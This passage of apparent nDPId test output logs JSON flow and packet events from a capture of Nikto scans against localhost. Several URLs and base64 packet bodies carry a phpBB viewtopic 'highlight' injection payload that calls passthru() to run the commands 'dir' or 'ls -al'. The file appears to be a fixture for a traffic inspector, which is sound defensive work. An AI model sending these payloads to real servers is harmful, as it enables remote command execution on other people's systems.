OiAxMjcuMC4wLjENCg0K"} -01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7440000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_packet_id":1,"flow_last_seen":1576420277786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"thread_ts_msec":1576420277786,"pkt":"AAAAAAAAAAAAAAAACABFAAFOulhAAEAGgU9\/AAABfwAAAcbkH5AY64NxSFA9PIAYAED\/QgAAAQEICp1m\/0KdZv9CR0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7440000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_packet_id":1,"flow_last_seen":1576420277788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277788,"pkt":"AAAAAAAAAAAAAAAACABFAAFMGchAAEAGIeJ\/AAABfwAAAcbmH5Ae1yDiPfgPVIAYAED\/QAAAAQEICp1m\/0OdZv9DR0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQoNCg=="} -01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_packet_id":1,"flow_last_seen":1576420277790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277790,"pkt":"AAAAAAAAAAAAAAAACABFAAFMIAVAAEAGG6V\/AAABfwAAAcboH5Bd5RklMuM7\/YAYAED\/QAAAAQEICp1m\/0adZv9GR0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_packet_id":1,"flow_last_seen":1576420277792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277792,"pkt":"AAAAAAAAAAAAAAAACABFAAFfB5NAAEAGNAR\/AAABfwAAAcbqH5CefT66jrIPCIAYAED\/UwAAAQEICp1m\/0idZv9HR0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001393)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_packet_id":1,"flow_last_seen":1576420277794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277794,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgStAAEAGumR\/AAABfwAAAcbsH5DtZbgCN0MtSoAYAED\/WgAAAQEICp1m\/0qdZv9KR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001394)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_packet_id":1,"flow_last_seen":1576420277795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277795,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgfFAAEAGuZ5\/AAABfwAAAcbuH5ChILjHXT7L3YAYAED\/WgAAAQEICp1m\/0udZv9LR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NSkNCg0K"} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001395)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00859{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_packet_id":1,"flow_last_seen":1576420277797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277797,"pkt":"AAAAAAAAAAAAAAAACABFAAFPlMhAAEAGpt5\/AAABfwAAAcbwH5AHpq3wv20OaIAYAED\/QwAAAQEICp1m\/02dZv9NR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001396)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_packet_id":1,"flow_last_seen":1576420277799,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277799,"pkt":"AAAAAAAAAAAAAAAACABFAAFm4IpAAEAGWwV\/AAABfwAAAcbyH5CWqtmi9bUd64AYAED\/WgAAAQEICp1m\/0+dZv9PR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_packet_id":1,"flow_last_seen":1576420277800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277800,"pkt":"AAAAAAAAAAAAAAAACABFAAFvelxAAEAGwSp\/AAABfwAAAcb0H5AcBENxXyULZYAYAED\/YwAAAQEICp1m\/1CdZv9QR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
